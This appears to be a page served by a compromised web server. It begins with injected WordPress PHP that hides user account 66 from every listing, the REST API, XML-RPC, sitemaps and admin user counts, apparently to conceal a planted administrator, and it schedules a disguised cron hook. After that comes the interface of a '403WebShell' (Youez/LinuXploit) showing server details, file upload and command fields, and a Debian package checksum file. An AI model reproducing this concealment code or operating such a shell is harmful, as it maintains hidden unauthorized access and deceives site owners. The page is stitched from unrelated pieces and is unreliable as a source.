add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/debconf-i18n.md5sums
d2f3245566b884faf0d82ed6e238664a  usr/share/locale/ar/LC_MESSAGES/debconf.mo
27f5326d9804f438f8ed80f9d68a5d96  usr/share/locale/ast/LC_MESSAGES/debconf.mo
25ddb736a0c87e6d16216767d6fa6456  usr/share/locale/bg/LC_MESSAGES/debconf.mo
8b52a6f32bdee981a0023a824f3c7de0  usr/share/locale/bn/LC_MESSAGES/debconf.mo
a6d37f13607002bff0b247d965b4e88c  usr/share/locale/bs/LC_MESSAGES/debconf.mo
4869d4975f22f7f25cef2ed9e7de5d84  usr/share/locale/ca/LC_MESSAGES/debconf.mo
ca1cf1d8ad3c107252dc5bb6755fc182  usr/share/locale/cs/LC_MESSAGES/debconf.mo
bd9699e0e61efcc385fa4ed344e7eb01  usr/share/locale/da/LC_MESSAGES/debconf.mo
20f4c7194cc44b736f5080b4a21066f4  usr/share/locale/de/LC_MESSAGES/debconf.mo
947dc0621ca15a5a20260864fe41d16c  usr/share/locale/dz/LC_MESSAGES/debconf.mo
3e9af06ed7f501ecdfb950e72584cec0  usr/share/locale/el/LC_MESSAGES/debconf.mo
5f5675cbcb059177da4bbdc8be173767  usr/share/locale/eo/LC_MESSAGES/debconf.mo
967558a960fc480dc9a00c74c054afc8  usr/share/locale/es/LC_MESSAGES/debconf.mo
4a387a3deff3f7ba47b568461a344abe  usr/share/locale/eu/LC_MESSAGES/debconf.mo
de27f4e42cec7fb7a5235a20b662f213  usr/share/locale/fi/LC_MESSAGES/debconf.mo
ded77f9bbfa1b535b4a56fa63676ede3  usr/share/locale/fr/LC_MESSAGES/debconf.mo
f63d8171649fc243d7cdc1513c57edea  usr/share/locale/gl/LC_MESSAGES/debconf.mo
8622f80e074fed1f251f4f3d3391500f  usr/share/locale/he/LC_MESSAGES/debconf.mo
78634bc00977a8d9100774d59f69ab7c  usr/share/locale/hu/LC_MESSAGES/debconf.mo
1134d88b7ce72efe3f700c168bc4f1d8  usr/share/locale/id/LC_MESSAGES/debconf.mo
c1cd43b5a3d3b1bd8f8c57bb13b6e7bc  usr/share/locale/it/LC_MESSAGES/debconf.mo
f31b06e309b8edfaf7418bac75a6ba8e  usr/share/locale/ja/LC_MESSAGES/debconf.mo
e2a168ee9fe78f89d8f33da7bbf2ecd9  usr/share/locale/km/LC_MESSAGES/debconf.mo
ca123df95bf1906dedd8469860c45142  usr/share/locale/ko/LC_MESSAGES/debconf.mo
3bec72329fc2f778a2fb73b161bbf055  usr/share/locale/ku/LC_MESSAGES/debconf.mo
dd4d0d7c3d21d4198149d2fd17af039a  usr/share/locale/mr/LC_MESSAGES/debconf.mo
644b399d587a68d9a8048bbfddfe2be3  usr/share/locale/nb/LC_MESSAGES/debconf.mo
2f32341e29f37d6b70c79b5867400db7  usr/share/locale/ne/LC_MESSAGES/debconf.mo
e6a99b994d51163fc79b066916012a48  usr/share/locale/nl/LC_MESSAGES/debconf.mo
a6b0a66d2b5b4d2dd60592261d61f88d  usr/share/locale/nn/LC_MESSAGES/debconf.mo
27acc0775eeb12f7b98a6ec55f6dadb6  usr/share/locale/oc/LC_MESSAGES/debconf.mo
f010cc777c3b571fb62e41180bf37679  usr/share/locale/pa/LC_MESSAGES/debconf.mo
3e522f7b083c2bf125165104c889d98f  usr/share/locale/pl/LC_MESSAGES/debconf.mo
e3225d25358822134f939d8d9eed784b  usr/share/locale/pt/LC_MESSAGES/debconf.mo
1924510bbd0b62d65f6818feebf1e8da  usr/share/locale/pt_BR/LC_MESSAGES/debconf.mo
acdf9b5188e3c7ffcae7a4e740967829  usr/share/locale/ro/LC_MESSAGES/debconf.mo
9c3bab2d6c03b8e2468a87f60828cedc  usr/share/locale/ru/LC_MESSAGES/debconf.mo
8e3aef752c3f09d60f6b8cd69e9b53b1  usr/share/locale/ru_UA/LC_MESSAGES/debconf.mo
f4e2cb386bea7beb790a864c6651e897  usr/share/locale/sk/LC_MESSAGES/debconf.mo
747ae1bbd5d12f5b6a113b9affad1083  usr/share/locale/sl/LC_MESSAGES/debconf.mo
4a6b4dd039151fc95a5ff213338c1f2c  usr/share/locale/sv/LC_MESSAGES/debconf.mo
c7897f3ad4d61a837ba9c7d08d0d0496  usr/share/locale/th/LC_MESSAGES/debconf.mo
197ccf1d72ae872c9192b65d022ca5ca  usr/share/locale/tl/LC_MESSAGES/debconf.mo
48a40b96f7ff2930a8bf45447a1ff410  usr/share/locale/tr/LC_MESSAGES/debconf.mo
76ce3d3b6bee3e368862f8c0f8425703  usr/share/locale/uk/LC_MESSAGES/debconf.mo
3dd1db8bcb48473ff83eb5a2c1e317c9  usr/share/locale/vi/LC_MESSAGES/debconf.mo
54b7181d1385ee945829c28428506813  usr/share/locale/zh_CN/LC_MESSAGES/debconf.mo
68e17affde0de552a7dc5bb2c4da2bf1  usr/share/locale/zh_TW/LC_MESSAGES/debconf.mo
38001d1dc5895febc0004d942c2f8a67  usr/share/man/da/man1/debconf.1.gz
74e619ec5e692c922b742b7279694c2c  usr/share/man/da/man8/dpkg-preconfigure.8.gz
f58a1517601a07072b0c10f61b43e0ec  usr/share/man/de/man1/debconf-apt-progress.1.gz
c72311a4567ae107b6a0159e2b5392da  usr/share/man/de/man1/debconf-communicate.1.gz
953b8165282e7d763560aee97d49b6f7  usr/share/man/de/man1/debconf-copydb.1.gz
34bf7991b734bc757503260ff9b650ca  usr/share/man/de/man1/debconf-escape.1.gz
0b5f898f13bc933437e512a584725887  usr/share/man/de/man1/debconf-set-selections.1.gz
0f00eb191241f603e4146119831bcff9  usr/share/man/de/man1/debconf-show.1.gz
9039c2044e0e0be6cb79e4e528bdb551  usr/share/man/de/man1/debconf.1.gz
de42c3450b4fac6efc17d3513dd4235c  usr/share/man/de/man8/dpkg-preconfigure.8.gz
cc567b37dcf0154fc16d435632a68bef  usr/share/man/de/man8/dpkg-reconfigure.8.gz
0b7e68e514e8c89915f0a9d804b94862  usr/share/man/es/man1/debconf-apt-progress.1.gz
978ea316511af1af10516a4b1ee480da  usr/share/man/es/man1/debconf-communicate.1.gz
63726fa1e2ce2f780602f0d8f571e861  usr/share/man/es/man1/debconf-copydb.1.gz
1f60e7259d280be5898195f87cf57fad  usr/share/man/es/man1/debconf-escape.1.gz
bd1a90aa9add65534819c6f789c9ebae  usr/share/man/es/man1/debconf-set-selections.1.gz
755e6b94a47abb259ab7cf406c1d6799  usr/share/man/es/man1/debconf-show.1.gz
406ed2e9a602374faacda4bfbe6ea989  usr/share/man/es/man1/debconf.1.gz
7562fb4d9dc787961058fdb809b687c5  usr/share/man/es/man8/dpkg-preconfigure.8.gz
152be06ba54c4063d69ba2ba9477c5c7  usr/share/man/es/man8/dpkg-reconfigure.8.gz
7b4c79f63bf2beb95e1777c262817d56  usr/share/man/fr/man1/debconf-apt-progress.1.gz
4fd3bd66de48e6a94098af67e907a93c  usr/share/man/fr/man1/debconf-communicate.1.gz
f12e68f606077b2a0f0478f5d5a1fa79  usr/share/man/fr/man1/debconf-copydb.1.gz
3f0b3aaf2454c1120c1f1dbd63f687d8  usr/share/man/fr/man1/debconf-escape.1.gz
6611595ea4cacada69f8a0ac687e54a2  usr/share/man/fr/man1/debconf-set-selections.1.gz
fbb474fb45a64c3bab4167956b75e52d  usr/share/man/fr/man1/debconf-show.1.gz
a118d69f095856d3d8dfe13db85bac05  usr/share/man/fr/man1/debconf.1.gz
aea26451178515928f063a550b7c4f5c  usr/share/man/fr/man8/dpkg-preconfigure.8.gz
acecf1ebe1f607d312799420b2162e0c  usr/share/man/fr/man8/dpkg-reconfigure.8.gz
1c92af3298080a6b82bcff8aaca79a51  usr/share/man/pt/man1/debconf-apt-progress.1.gz
c02b0c000b0217cfa33c5b39547fe83e  usr/share/man/pt/man1/debconf-communicate.1.gz
6a05175945afe0602444972128964893  usr/share/man/pt/man1/debconf-copydb.1.gz
844afa339fd9bc325f597cdf1d49d66a  usr/share/man/pt/man1/debconf-escape.1.gz
93ef098ca5a9f390b828974e5485e6ba  usr/share/man/pt/man1/debconf-set-selections.1.gz
95e1d7dba9f1f353534295b80c33f4c3  usr/share/man/pt/man1/debconf-show.1.gz
bec4810a23907c0042277ee4c0ee464b  usr/share/man/pt/man1/debconf.1.gz
1e6189b30a75b14fb91121bf1d78a51c  usr/share/man/pt/man8/dpkg-preconfigure.8.gz
c72714863e9baca04ca1ffb2b283e1fe  usr/share/man/pt/man8/dpkg-reconfigure.8.gz
032797e68053f6648ec840534dce30c6  usr/share/man/pt_BR/man1/debconf-communicate.1.gz
192934eb7ea496ae2010380e53628d71  usr/share/man/pt_BR/man8/dpkg-preconfigure.8.gz
cdd9e7829a531ae80564b55daca37aa3  usr/share/man/ru/man1/debconf-apt-progress.1.gz
8825f54f1f95db6dbf3755ea89a7d170  usr/share/man/ru/man1/debconf-communicate.1.gz
92fa9bcabc936bcbd94b880b0d3ce2f9  usr/share/man/ru/man1/debconf-copydb.1.gz
e654919fce4e395f66afb6686f14760d  usr/share/man/ru/man1/debconf-escape.1.gz
b484acc8930499a97fa7c86a84e2e872  usr/share/man/ru/man1/debconf-set-selections.1.gz
f9cd84c60318cc899d39cc020d5a47f4  usr/share/man/ru/man1/debconf-show.1.gz
41bed8c22bd56aee27c2ec74bf6c166f  usr/share/man/ru/man1/debconf.1.gz
cc8fb2c1bef34ff8497ae6c6157adb5d  usr/share/man/ru/man8/dpkg-preconfigure.8.gz
df866cfd087ac784d493de4cc4adf08f  usr/share/man/ru/man8/dpkg-reconfigure.8.gz

Youez - 2016 - github.com/yon3zu
LinuXploit